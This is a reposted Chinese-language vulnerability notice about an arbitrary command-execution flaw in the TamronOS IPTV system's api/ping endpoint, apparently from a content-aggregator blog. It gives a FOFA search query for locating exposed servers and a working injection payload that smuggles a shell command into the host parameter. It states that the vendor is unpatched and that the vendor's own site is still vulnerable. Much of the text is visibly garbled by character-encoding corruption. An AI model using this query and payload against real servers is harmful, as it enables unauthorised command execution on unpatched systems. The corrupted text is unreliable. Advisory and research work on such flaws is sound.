TamronOS IPTV系统 ping 任意命令执行漏洞
生活随笔
收集整理的這篇文章主要介紹了
TamronOS IPTV系统 ping 任意命令执行漏洞
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
TamronOS IPTV系統(tǒng) ping 任意命令執(zhí)行漏洞
目錄
系統(tǒng)簡(jiǎn)介
漏洞描述
漏洞復(fù)現(xiàn)
總結(jié)
系統(tǒng)簡(jiǎn)介
TamronOS IPTV/VOD系統(tǒng)是一套基于Linux內(nèi)核開發(fā)的寬帶運(yùn)營(yíng)商、酒店、學(xué)校直播點(diǎn)播一體解決方案,系統(tǒng)提供了多種客戶端(Android機(jī)頂盒、電視、PC版點(diǎn)播、手機(jī)版點(diǎn)播)方便用戶通過不同的設(shè)備接入。 同時(shí)系統(tǒng)支持多種節(jié)目源接入(衛(wèi)星源、廣電源、運(yùn)營(yíng)商IPTV源、網(wǎng)絡(luò)源、自辦頻道、編碼器等其他第三方設(shè)備提供的源)。基于Apple公司的HLS直播傳輸技術(shù),以及我公司自主研發(fā)的動(dòng)態(tài)內(nèi)存切片技術(shù),在使用 流媒體輸出的同時(shí)保證了最大用戶待機(jī)量(一個(gè)千兆口1500用戶、一個(gè)萬兆口6-8K用戶),同時(shí)也是國(guó)內(nèi)唯一能實(shí)現(xiàn)單臺(tái)服務(wù)器負(fù)載140-200路直播的IPTV系統(tǒng)。 TamronOS采用自主研發(fā)的視頻解析下載系統(tǒng),配合云數(shù)據(jù),能夠自動(dòng)完成對(duì)影片的采集、下載、合并、入庫(kù),所有影視劇與十大視頻網(wǎng)站幾乎同步更新。同時(shí)擁有最人性話UI設(shè)計(jì)和更為直觀的后臺(tái)管系統(tǒng),未接觸過 類似系統(tǒng)的用戶,可以通過閱讀本教程快速熟練的搭建IPTV系統(tǒng)。漏洞描述
TamronOS IPTV系統(tǒng)?api/ping?存在任意命令執(zhí)行漏洞,攻擊者通過漏洞可以執(zhí)行任意命令。漏洞復(fù)現(xiàn)
FOFA搜索 app="TamronOS-IPTV系統(tǒng)" 漏洞POC如下 /api/ping?count=5&host=;id;?
廠商尚未提供漏洞修復(fù)方案,請(qǐng)關(guān)注廠商主頁(yè)更新:TamronOS--全國(guó)領(lǐng)先的IPTV系統(tǒng)提供商總結(jié)
這個(gè)系統(tǒng)的提供商官網(wǎng)也還存在這個(gè)漏洞
總結(jié)
以上是生活随笔為你收集整理的TamronOS IPTV系统 ping 任意命令执行漏洞的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 深度学习中的batch和epoch
- 下一篇: gcc编译参数